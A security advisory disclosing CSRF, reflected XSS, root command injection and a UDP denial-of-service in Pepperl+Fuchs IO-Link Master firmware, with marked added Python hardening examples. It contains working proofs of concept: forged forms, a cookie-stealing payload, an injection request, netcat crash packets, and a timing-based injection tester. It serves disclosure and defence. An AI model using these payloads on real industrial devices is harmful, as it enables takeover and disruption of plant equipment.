=======================================================================
title: Multiple vulnerabilities
product: Pepperl+Fuchs IO-Link Master Series
         (see "Vulnerable / tested versions")
vulnerable version: System 1.36 / Application 1.5.28
fixed version: System 1.52 / Application 1.6.11
CVE number: CVE-2020-12511, CVE-2020-12512, CVE-2020-12513,
CVE-2020-12514
impact: High
homepage: https://www.pepperl-fuchs.com
found: 2020-04-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Automation is our world. Perfect application solutions are our goal.
In 1945, Walter Pepperl and Ludwig Fuchs founded a small radio workshop in
Mannheim, Germany, based on the principles of inventiveness, entrepreneurial
foresight, and self-reliance. The experience they acquired was transformed
into new ideas, and they continued to enjoy developing products for
customers. The eventual result was the invention of the proximity switch.
This innovation represented the starting point of the company's success
story.

Today, Pepperl+Fuchs is known by customers around the world as a pioneer and
an innovator in electrical explosion protection and sensor technology. Our
main focus is always on your individual requirements: With a passion for
automation and groundbreaking technology, we are committed to working in
partnership with you now and in the future. We understand the demands of
your markets, developing specific solutions, and integrating them into your
processes."
Source: https://www.pepperl-fuchs.com/usa/en/25.htm
Business recommendation:
------------------------
SEC Consult recommends updating the devices to the newest firmware packages
(System 1.52 / Application 1.6.11), where the documented issues are fixed
according to the vendor. The tested firmware (System 1.36 / Application
1.5.28) is the vulnerable one.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The web interface that is used to set all configurations is vulnerable to
cross-site request forgery: state-changing POST requests are accepted
without an anti-CSRF token (see the proof of concept). An attacker can
change device settings by luring a logged-in victim to a malicious website
that submits such a request from the victim's browser.
2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)
An authenticated reflected cross-site scripting vulnerability can be
triggered by issuing a POST request to the "/Software" endpoint of the web
service: the "language" parameter is reflected unencoded into an HTML
attribute. An attacker can abuse this vulnerability to steal the cookies of
the attacked user in order to log on to the device, or to perform actions
in the context of the attacked user. As the vulnerable request is a POST,
it can be delivered from an attacker-controlled page in the same way as the
CSRF issue described in 1).
3) Authenticated Blind Command Injection (CVE-2020-12513)
A command injection was identified in the web interface. The vulnerability
exists because unfiltered user input is appended to a command string that
is then executed with PHP's "exec()". The web server runs as root, so the
injected commands are executed as the root user.
4) Null Pointer Dereference / DoS in "discoveryd" (CVE-2020-12514)
The discovery daemon ("discoveryd") is started during the bootup of the
device and serves the network management program "PortVision DX". It is
implemented with unsafe string functions and is vulnerable to a
denial-of-service attack: a single unauthenticated UDP packet triggers a
null pointer dereference in strlen() and crashes the daemon. A debug mode
is also available in the program; it is activated by starting the daemon
with "discoveryd -vv" and prints all inputs to stdout during execution.
The productive device does not run in this mode, but in debug mode the
same inputs reach additional code paths that could enable more severe
attacks.
5) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device
during a quick examination. One of the discovered vulnerabilities
(CVE-2017-16544 in BusyBox) was verified by using the MEDUSA scalable
firmware runtime.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The following PoC can be used to change the hostname of the device to
"SEC-Consult". The request submits the whole network configuration at
once, so the remaining fields must contain values that fit the target
network:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://$IP/configuration_tab/ajax_comb_table_save/network_config/network_config_schema"
method="POST">
<input type="hidden" name="form"
value="Hostname=SEC-Consult&IPv4mode=static&IPv4address=1.101&IPv4netmask=255.255.255.0&IPv4gateway=1.1.12&DNSmode=manual&IPv4DNS1=&IPv4DNS2=&IpAddrCnflctDetectEnbl=enable&NtpServer=&SyslogServer=&SyslogPort=514&SshServerEnable=disable"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
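The PoC above works because the device accepts the form with nothing but the session cookie, which the browser attaches automatically. The following added example (not code from the advisory or from the device firmware) shows the two checks a state-changing handler would need to reject that request: an Origin/Referer comparison against the device's own host, and a per-session token embedded in the form. The token store, the "csrf_token" field name and the device address 192.0.2.10 are assumptions made for this example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical per-session token store: PHPSESSID -> CSRF token.
# (Assumption for this example; the device firmware has no such store.)
_SESSION_TOKENS = {}


def issue_token(session_id):
    """Create a fresh CSRF token bound to one session and return it.
    It must be embedded in every state-changing form the device serves."""
    token = secrets.token_hex(16)
    _SESSION_TOKENS[session_id] = token
    return token


def _origin_host(headers):
    """Return the host named by Origin (preferred) or Referer, or None."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname
    return None


def is_legitimate_state_change(headers, cookies, form, device_host):
    """Return (ok, reason) for a POST that changes device state.

    Two independent checks, both of which the CSRF PoC fails:
    1. Origin/Referer must name the device itself. A cross-site form post
       carries the attacker's origin (or none if the browser strips it).
    2. The form must carry the token bound to the PHPSESSID cookie.
    """
    session_id = cookies.get("PHPSESSID")
    if not session_id or session_id not in _SESSION_TOKENS:
        return False, "no authenticated session"
    origin = _origin_host(headers)
    if origin is None or origin.lower() != device_host.lower():
        return False, "cross-origin request (Origin/Referer mismatch)"
    supplied = form.get("csrf_token", "")
    expected = _SESSION_TOKENS[session_id]
    # Constant-time compare so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    device = "192.0.2.10"                       # constructed device address
    sid = "r7jtaceerqeijqr4b2dl0us814"          # session id from the advisory
    token = issue_token(sid)
    # Request as produced by the PoC page: the browser auto-sends the cookie,
    # Origin is the attacker's site and the form carries no token.
    forged = is_legitimate_state_change(
        {"Origin": "https://attacker.example"}, {"PHPSESSID": sid},
        {"form": "Hostname=SEC-Consult&IPv4mode=static"}, device)
    # Same form submitted from the device's own page with the token.
    genuine = is_legitimate_state_change(
        {"Origin": "https://" + device}, {"PHPSESSID": sid},
        {"form": "Hostname=iolm-1", "csrf_token": token}, device)
    print("forged :", forged)
    print("genuine:", genuine)
```

The Origin check alone is not enough on its own (older browsers and some proxies omit the header), and the token alone does not help if the token itself is reflected somewhere readable by the XSS in 2), which is why both are checked.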
2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)
By sending the following request to the web service, a reflected cross-site
scripting vulnerability can be triggered:
-------------------------------------------------------------------------------
POST /Software HTTP/1.1
Host: $IP
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: ui_language=en_US; PHPSESSID=r7jtaceerqeijqr4b2dl0us814
Upgrade-Insecure-Requests: 1
language=german'><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
The server responds with the following content:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Content-Length: 11860
Connection: close
Date: Thu, 01 Jan 1970 00:59:46 GMT
Server: lighttpd/1.4.41
[...]
<div class="page-content">
<div class="page-header">
<h1>Software <a
href='/assets/WebHelp/german'><script>alert(document.cookie)</script>/advanced/software.htm'
target='_blank'><img src='/assets/images/question_16.png'
alt='Page-specific Help'></a></h1>
<a class="latest-version" href="#">Check for latest
version</a>
</div>
[...]
-------------------------------------------------------------------------------
PoC-Exploit code for the cross-site scripting vulnerability:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/Software" method="POST">
<input type="hidden" name="language"
value="german'><script>alert(document.cookie)</script>"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
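The server response shows the injection context exactly: the "language" parameter lands inside a single-quoted href, so one "'" closes the attribute and the rest of the input becomes new markup. The following added example (not the device's PHP code, which is not available; a Python re-creation of the same string building) puts the vulnerable construction next to a hardened one and reads the href back the way a browser would, up to the next quote. The set of help languages is an assumption.

```python
import html
import re

# Help languages assumed to exist on the device (assumption for this example).
KNOWN_HELP_LANGUAGES = {"english", "german"}

# The value from the PoC request, after form decoding.
PAYLOAD = "german'><script>alert(document.cookie)</script>"

_HREF_RE = re.compile(r"href='([^']*)'")


def help_link_vulnerable(language):
    """Mirrors the behaviour visible in the response: the POST parameter is
    concatenated into a single-quoted href without any encoding."""
    return ("<a href='/assets/WebHelp/" + language +
            "/advanced/software.htm' target='_blank'>Help</a>")


def escape_for_attribute(value):
    """Context-aware encoding for a quoted HTML attribute. quote=True makes
    html.escape turn ' into &#x27; and " into &quot;, so the attribute can
    no longer be closed early; < and > are encoded as well."""
    return html.escape(value, quote=True)


def help_link_hardened(language):
    """Two layers: an allowlist (the value is a path segment, only known
    languages make sense) and encoding of whatever is emitted, so the
    output stays safe even if the allowlist is later relaxed."""
    if language not in KNOWN_HELP_LANGUAGES:
        language = "english"          # safe default instead of echoing input
    return ("<a href='/assets/WebHelp/" + escape_for_attribute(language) +
            "/advanced/software.htm' target='_blank'>Help</a>")


def href_value(markup):
    """Return the href as a browser reads it: everything up to the next
    single quote. If the input contained a quote, the value is cut short
    and what follows is parsed as new tags."""
    m = _HREF_RE.search(markup)
    return m.group(1) if m else None


if __name__ == "__main__":
    for build in (help_link_vulnerable, help_link_hardened):
        out = build(PAYLOAD)
        print(build.__name__)
        print("  href seen by browser:", href_value(out))
        print("  script tag present  :", "<script>" in out)
```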
3) Authenticated Blind Command Injection (CVE-2020-12513)
By entering a command surrounded by ";" in the field "code" under the tab
"IO-Link Test Event Generation" on the endpoint "/Misc/Settings", the
command gets executed. The following POST request to the web service
demonstrates this with the command "ping 127.0.0.1":
-------------------------------------------------------------------------------
POST /index.php/ajax/generate_iolink_event/ HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://$IP/Misc/Settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
Cookie: ui_language=en_US; PHPSESSID=lh8d4g4e8fm9f1732j9g6bm3a0
mode=single&type=message&instance=unknown&source=local&pdivalid=valid&code=0x0000%3Bping+127.0.0.1%3B
-------------------------------------------------------------------------------
The web service returns no output that would indicate to the attacker
whether the command was executed, hence "blind". As this was tested on an
emulated device only, execution was confirmed via the process list, which
proved that the command ran as root:
-------------------------------------------------------------------------------
-bash-4.4# ps
PID USER COMMAND
[...]
216 root /usr/sbin/restoremonitor
272 root /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
333 root /apps/bin/appmgr
347 root 05discoverd
349 root 11iolinkconfigd
353 root 90netconfig-saved
354 root 90netconfig-working
385 root lighttpd -f /apps/www/lighttpd.conf
386 root /usr/bin/php-cgi
387 root /usr/bin/php-cgi
388 root /usr/bin/php-cgi
389 root /usr/bin/php-cgi
390 root /usr/bin/php-cgi
391 root /usr/bin/php-cgi
392 root config waitcmd working network /apps/bin/updateLighttpdAuth
395 root /usr/bin/php-cgi
397 root -bash
399 root /usr/bin/php-cgi
473 root udhcpc -R -n -O search -p /var/run/udhcpc.eth0.pid -i eth0 -x ho
2519 root [kworker/u3:2]
3173 root sh -c injectEvent -m single -t message -i unknown -s local -v va
3175 root ping 127.0.0.1
3509 root 50ethernetip
3541 root [10iolinkd]
3544 root ps
-------------------------------------------------------------------------------
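Outside an emulator there is no process list to look at, so a tester needs a signal that does not depend on output. The following added example (not part of the advisory, and not the tester's tooling) builds the same form body as the request above and confirms the injection by timing: a "sleep N" payload is compared against a harmless "true" payload. It assumes the command runs synchronously inside the request (consistent with exec() waiting for the child) and that the endpoint does answer eventually; if it never answers, use an out-of-band check instead, such as injecting a ping to a host you control, which is what the advisory's own ping demonstrates. The offline transport is constructed for this example.

```python
import http.client
import re
import time
from urllib.parse import urlencode

ENDPOINT = "/index.php/ajax/generate_iolink_event/"


def build_body(command, event_code="0x0000"):
    """Form body for the event generator. The command is wrapped in ';'
    exactly as in the captured request, then URL-encoded (';' -> %3B)."""
    return urlencode({
        "mode": "single", "type": "message", "instance": "unknown",
        "source": "local", "pdivalid": "valid",
        "code": event_code + ";" + command + ";",
    })


def send_event(host, session_id, body, timeout):
    """Real transport: one authenticated POST over plain HTTP, returning the
    elapsed seconds. A socket timeout is treated as 'no answer yet' rather
    than an error, because the injection is blind."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "http://%s/Misc/Settings" % host,
        "Cookie": "ui_language=en_US; PHPSESSID=" + session_id,
    }
    start = time.monotonic()
    try:
        conn.request("POST", ENDPOINT, body, headers)
        conn.getresponse().read()
    except OSError:
        pass
    finally:
        conn.close()
    return time.monotonic() - start


def simulated_transport(honours_sleep):
    """Constructed offline stand-in for send_event: 0.2 s per request, plus
    the injected sleep if the simulated device executes it."""
    def fake(host, session_id, body, timeout):
        m = re.search(r"sleep\+(\d+)", body)
        if honours_sleep and m:
            return 0.2 + int(m.group(1))
        return 0.2
    return fake


def timing_check(host, session_id, delay=5, transport=send_event):
    """Return (vulnerable, baseline_seconds, delayed_seconds). The request
    with 'sleep <delay>' must take at least ~delay longer than the one with
    'true'; the generous timeout keeps a slow device from masking the sleep."""
    timeout = delay * 3
    baseline = transport(host, session_id, build_body("true"), timeout)
    delayed = transport(host, session_id,
                        build_body("sleep %d" % delay), timeout)
    return delayed - baseline >= delay * 0.8, baseline, delayed


if __name__ == "__main__":
    # Offline demonstration; replace the transport with send_event and a
    # valid PHPSESSID to run against a real device you are authorised to test.
    print(build_body("ping 127.0.0.1"))
    print(timing_check("192.0.2.10", "s", delay=3,
                       transport=simulated_transport(True)))
    print(timing_check("192.0.2.10", "s", delay=3,
                       transport=simulated_transport(False)))
```

Run the timing check two or three times with different delays before trusting a positive result; a single slow request on a loaded device is easy to mistake for an honoured sleep.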
4) Null Pointer Dereference / DoS in "discoveryd" (CVE-2020-12514)
Payload for triggering a segmentation fault (caused by a null pointer
dereference). The datagram is sent unauthenticated to UDP port 4606:
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x00\x0c\x00\x10\x10" | nc -u $IP 4606
Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb)
Payload for writing ASCII characters in debug mode ("discoveryd -vv").
Register R4 can be controlled via a single byte (filled with the value
"\xab" below), also in normal mode ("discoveryd"):
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63" | nc -u $IP 4606
Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb) i r
r0 0x0 0
r1 0x0 0
r2 0xbefffb9b 3204447131
r3 0x0 0
r4 0xab 171
r5 0x1da 474
r6 0xb6f8dbee 3069762542
r7 0x0 0
r8 0x0 0
r9 0x0 0
r10 0xb6ffef74 3070226292
r11 0xbefff574 3204445556
r12 0xb6f5dfb0 3069566896
sp 0xbefff558 0xbefff558
lr 0xaf9c 44956
pc 0xb6f5dfb4 0xb6f5dfb4 <strlen+4>
cpsr 0xa0000010 -1610612720
fpscr 0x0 0
More bytes than in this payload lead to another program execution path in
debug mode ("discoveryd -vv"):
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606
Other program paths, depending on the current memory contents, can be
triggered with this payload in debug mode due to printf:
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606
In normal mode, only the null pointer dereference is triggered, which
crashes the program.
5) Outdated and Vulnerable Software Components
* PHP 5.6.15
* lighttpd 1.4.41
* OpenSSL 1.0.2j
* Linux Kernel 2.6.30
* BusyBox 1.26.2
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was
verified on an emulated device. A file with the name
"\ectest\n\e]55;test.txt\a" (ESC, newline and BEL bytes embedded in the
name) was created to trigger the vulnerability; pressing <TAB> makes the
shell print the raw escape sequences to the terminal:
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
]55;test.txt
#
-------------------------------------------------------------------------------
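The file name used above carries an ESC-] ... BEL sequence, i.e. a terminal OSC command, which the shell passed straight to the terminal. The following added example (not from the advisory and not BusyBox's fix) does what a hardened listing does: it flags names containing control bytes and renders them with "?" placeholders, the same convention as "ls -q". It works on the bytes API so names that are not valid UTF-8 are still handled, and the scratch directory and trigger file are constructed inside the example.

```python
import os
import re
import tempfile

# The trigger file name from the advisory as raw bytes:
# ESC t e s t NL ESC ] 5 5 ; t e s t . t x t BEL
TRIGGER_NAME = b"\x1btest\n\x1b]55;test.txt\x07"

# Any C0 control byte (0x00-0x1F) or DEL; this covers ESC, NL and BEL.
_CONTROL = re.compile(rb"[\x00-\x1f\x7f]")


def has_terminal_controls(name):
    """True if printing this name verbatim would hand control sequences to
    the terminal, which is what vulnerable BusyBox tab completion did."""
    return _CONTROL.search(name) is not None


def sanitize_for_terminal(name):
    """Replace every control byte with '?', the visible placeholder that
    'ls -q' uses, so the name stays identifiable but cannot drive the
    terminal."""
    return _CONTROL.sub(b"?", name)


def find_suspicious_names(directory):
    """Scan one directory and return the raw names that contain control
    bytes. Useful as a quick check on a box you suspect has been seeded
    with such files."""
    return sorted(n for n in os.listdir(os.fsencode(directory))
                  if has_terminal_controls(n))


def demo():
    """Create the trigger file in a scratch directory, scan for it and
    return the sanitized rendering of every hit."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(os.fsencode(tmp), TRIGGER_NAME)
        open(path, "wb").close()
        return [sanitize_for_terminal(n) for n in find_suspicious_names(tmp)]


if __name__ == "__main__":
    for rendered in demo():
        # Safe to print: all control bytes have been replaced.
        print(rendered.decode("ascii"))
```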
The vulnerabilities 1), 2), 3) and 4) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.
Vulnerable / tested versions:
-----------------------------
The IO-Link Master devices share the same firmware base. The
vulnerabilities were tested on an emulated firmware (system 1.36 /
app EIP 1.5.28). According to the vendor, all application firmware
versions up to and including 1.5.48 are vulnerable:
IO-Link Master 4-EIP / <=1.5.48
IO-Link Master 8-EIP / <=1.5.48
IO-Link Master 8-EIP-L / <=1.5.48
IO-Link Master DR-8-EIP / <=1.5.48
IO-Link Master DR-8-EIP-P / <=1.5.48
IO-Link Master DR-8-EIP-T / <=1.5.48
IO-Link Master 4-PNIO / <=1.5.48
IO-Link Master 8-PNIO / <=1.5.48
IO-Link Master 8-PNIO-L / <=1.5.48
IO-Link Master DR-8-PNIO / <=1.5.48
IO-Link Master DR-8-PNIO-P / <=1.5.48
IO-Link Master DR-8-PNIO-T / <=1.5.48
Vendor contact timeline:
------------------------
2020-04-30 | Contacting VDE CERT through
2020-07-29 | Received confirmation from VDE CERT.
2020-07-31 | Call with P+F regarding vulnerabilities from this and another
             advisory.
2020-09-29 | Call with Pepperl+Fuchs and CERT@VDE regarding status.
2020-10-02 | Received CVE IDs and preliminary advisory from CERT@VDE.
2020-11-11 | Call with Pepperl+Fuchs regarding the patches. They should be
             available within the next two weeks according to P+F. Agreed
             with P+F and VDE CERT to release the security advisory next
             year.
2020-12-14 | Received preliminary advisory from P+F. Set publication date
             to 2021-01-04.
2021-01-04 | Received final advisory from P+F.
2021-01-13 | Coordinated release of security advisory.
Solution:
---------
Update the firmware to Application 1.6.11 / System 1.52 to resolve the
security issues.
According to Pepperl+Fuchs, the following steps are recommended:
"In order to prevent the exploitation of the reported vulnerabilities, we
recommend that the affected units be updated with the following three
firmware packages:
- U-Boot bootloader version 1.36 or newer
- System image version 1.52 or newer
- Application base version 1.6.11 or newer
Furthermore, it is always recommended to observe the following measures if
the affected products are connected to public networks:
1. An external protective measure to be put in place.
Traffic from untrusted networks to the device should be blocked by a
firewall. Especially traffic targeting the administration webpage.
2. Device user accounts to be enabled with secure passwords.
If non-trusted people/applications have access to the network that the
device is connected to, then configuring passwords for all three User
Accounts is recommended."
Pepperl+Fuchs advisory page:
https://www.pepperl-fuchs.com/germany/de/29079.htm
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker.
The SEC Consult Vulnerability Lab supports high-quality penetration testing
and the evaluation of new offensive and defensive technologies for our
customers. Hence our customers obtain the most current information about
vulnerabilities and valid recommendations about the risk profile of new
technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2021